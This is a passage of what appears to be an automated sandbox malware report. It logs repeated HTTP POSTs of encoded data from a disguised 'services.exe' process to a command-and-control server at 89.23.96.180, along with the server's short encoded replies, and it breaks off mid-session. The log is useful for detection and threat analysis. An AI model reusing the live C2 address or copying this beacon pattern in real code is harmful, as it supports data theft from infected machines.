                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.54984089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:06.665671110 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:07.018275976 CET2536OUTData Raw: 58 57 43 55 5d 5e 57 53 55 5e 55 5a 54 53 50 55 57 58 5c 58 52 54 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XWCU]^WSU^UZTSPUWX\XRTQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.R16*25_:Y0X$<:: ?*%"-<?[<[7=5!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.54984489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:07.702097893 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2084
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:08.049510956 CET2084OUTData Raw: 5d 56 43 53 5d 5e 57 54 55 5e 55 5a 54 5d 50 50 57 5e 5c 55 52 52 51 58 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCS]^WTU^UZT]PPW^\URRQX_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C.1+%:*1=_.? X%,':8S79['"6V<';>.#)!_.#Q,>
                                                              Dec 21, 2024 10:48:09.080910921 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:09.313863993 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0f 34 3b 0c 0d 29 3a 24 01 29 2c 2e 1f 3e 07 36 5e 2c 1c 27 5e 23 2f 32 5a 29 13 3f 59 24 10 09 1e 21 2a 2a 00 21 3f 23 59 3e 1b 2e 58 01 1e 21 43 34 33 25 1c 27 06 3f 52 29 27 26 19 2b 00 2e 13 30 59 33 51 24 2a 3f 00 2b 03 2c 56 31 04 3e 59 2d 2f 2b 10 2b 2d 2f 0c 24 36 2b 51 03 1e 25 03 25 3f 3f 55 31 0d 29 1c 24 2e 26 04 20 2e 2b 56 3f 2b 37 1a 37 38 39 05 2d 3a 24 5c 2b 03 31 03 2a 06 22 13 30 02 34 09 26 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:4;):$),.>6^,'^#/2Z)?Y$!**!?#Y>.X!C43%'?R)'&+.0Y3Q$*?+,V1>Y-/++-/$6+Q%%??U1)$.& .+V?+7789-:$\+1*"04&.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.54984589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:07.824152946 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:08.174515963 CET2536OUTData Raw: 5d 51 46 54 5d 5b 52 55 55 5e 55 5a 54 5d 50 57 57 58 5c 5b 52 51 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QFT][RUU^UZT]PWWX\[RQQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#-+$-)>!.-,$U:;" ?>12(';^(/+%!_.#Q,>
                                                              Dec 21, 2024 10:48:09.201870918 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:09.434000015 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.54985189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:09.686455965 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:10.033987999 CET2536OUTData Raw: 58 52 46 53 5d 5f 57 50 55 5e 55 5a 54 5e 50 5c 57 5d 5c 55 52 53 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRFS]_WPU^UZT^P\W]\URSQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C.,T&>)>![,?%,,W:%Q"?%U*$3Z<'*%!_.#Q,2
                                                              Dec 21, 2024 10:48:11.064203024 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:11.298074007 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:10 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.54985789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:11.542387962 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:11.895791054 CET2536OUTData Raw: 58 57 43 56 5d 5f 57 55 55 5e 55 5a 54 5d 50 5d 57 59 5c 55 52 52 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XWCV]_WUU^UZT]P]WY\URRQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:;&!U*=:?,Y$+:&",%&T6+4(8Y=!_.#Q,>
                                                              Dec 21, 2024 10:48:12.920655012 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:13.155210018 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.54986389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:13.400047064 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:13.752748013 CET2536OUTData Raw: 5d 54 43 57 5d 57 52 53 55 5e 55 5a 54 58 50 51 57 52 5c 5b 52 5e 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]TCW]WRSU^UZTXPQWR\[R^QW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -<&[5)9:+$#.8"/)\%"*Q+$+.8Z>5!_.#Q,*


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.54986489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:14.467425108 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:14.815130949 CET2100OUTData Raw: 5d 53 46 52 58 5c 52 55 55 5e 55 5a 54 5b 50 50 57 59 5c 59 52 51 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SFRX\RUU^UZT[PPWY\YRQQ[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY 9!<S&9P=>.<$Y$Y,U:*4?)%?;]+4[+%!_.#Q,2
                                                              Dec 21, 2024 10:48:15.845374107 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:16.081958055 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 3b 03 1e 29 3a 0a 03 2a 3c 31 0c 29 3e 22 58 2f 0c 05 5f 35 12 0c 58 3e 3d 23 5e 27 2e 23 5d 36 29 29 5b 36 01 28 02 3d 0b 2e 58 01 1e 21 40 34 0d 2a 0a 27 59 2b 57 3e 19 3e 14 3c 2d 2e 13 24 3c 2b 14 25 3a 15 01 3f 2a 01 0e 26 2d 25 01 2c 06 3f 12 2b 3d 3c 54 30 36 2b 51 03 1e 26 5a 25 3f 24 0d 25 33 25 5e 25 10 0b 5e 34 00 20 0e 2a 2b 23 57 20 28 3a 5e 2f 5f 20 58 3c 03 32 10 2a 16 39 01 25 3f 24 0c 26 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989!;):*<1)>"X/_5X>=#^'.#]6))[6(=.X!@4*'Y+W>><-.$<+%:?*&-%,?+=<T06+Q&Z%?$%3%^%^4 *+#W (:^/_ X<2*9%?$&.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.54986589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:14.589155912 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:14.940237999 CET2536OUTData Raw: 58 54 43 57 5d 5f 52 55 55 5e 55 5a 54 59 50 52 57 58 5c 5c 52 57 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCW]_RUU^UZTYPRWX\\RWQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :1+1")2%_-,?$/'-(#[%2W+$3^<- Y>!_.#Q,.
                                                              Dec 21, 2024 10:48:15.967513084 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:16.202322960 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.54987189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:16.449567080 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:16.799633026 CET2536OUTData Raw: 5d 53 46 50 5d 57 57 5f 55 5e 55 5a 54 5c 50 57 57 5e 5c 59 52 53 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SFP]WW_U^UZT\PWW^\YRSQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9<V&%P>>.]%? V.(> 9X&!.V*'<>-,_)!_.#Q,
                                                              Dec 21, 2024 10:48:17.829046965 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:18.067035913 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.54987789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:18.306391001 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:18.658922911 CET2536OUTData Raw: 5d 54 46 55 5d 57 57 54 55 5e 55 5a 54 59 50 51 57 52 5c 55 52 56 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]TFU]WWTU^UZTYPQWR\URVQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A91<R%=9).? ]3.&4?*2"-<?+*5!_.#Q,.
                                                              Dec 21, 2024 10:48:19.684927940 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:19.921819925 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:19 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.54988389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:20.164455891 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:20.518322945 CET2536OUTData Raw: 58 55 46 53 5d 5b 52 50 55 5e 55 5a 54 5c 50 54 57 53 5c 5c 52 51 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XUFS][RPU^UZT\PTWS\\RQQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9&=W)^.,<3Y,W:.7&2<;([?)%!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.54988489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:21.219162941 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:21.565200090 CET2112OUTData Raw: 5d 52 46 53 5d 58 57 5f 55 5e 55 5a 54 5c 50 52 57 5e 5c 58 52 5f 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RFS]XW_U^UZT\PRW^\XR_Q[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#-1+$=V>![,/3?-^!S"/%21*P?7+\?. Z*5!_.#Q,
                                                              Dec 21, 2024 10:48:22.597081900 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:22.830002069 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 38 29 54 28 2a 2c 07 2a 11 39 0d 29 10 3e 59 3b 31 38 05 22 3c 3a 5a 2a 2d 3f 59 30 00 28 03 21 29 31 10 22 3c 34 02 29 21 2e 58 01 1e 21 41 20 1d 36 0d 27 2f 3f 1f 2a 27 03 07 28 3e 00 10 27 01 34 0e 26 04 20 16 28 04 0e 51 26 3d 3e 5b 2f 01 30 01 2b 3e 0d 0e 24 36 2b 51 03 1e 25 05 25 12 0d 55 26 1d 31 1c 32 10 00 05 20 3e 38 0d 3f 38 27 19 37 5d 26 5b 2f 39 0a 5e 2b 3d 07 02 3e 3b 26 1d 25 2c 37 55 24 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989!8)T(*,*9)>Y;18"<:Z*-?Y0(!)1"<4)!.X!A 6'/?*'(>'4& (Q&=>[/0+>$6+Q%%U&12 >8?8'7]&[/9^+=>;&%,7U$>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.54988589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:21.337713957 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:21.690118074 CET2536OUTData Raw: 58 54 43 57 5d 58 57 5f 55 5e 55 5a 54 5d 50 57 57 52 5c 5f 52 54 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
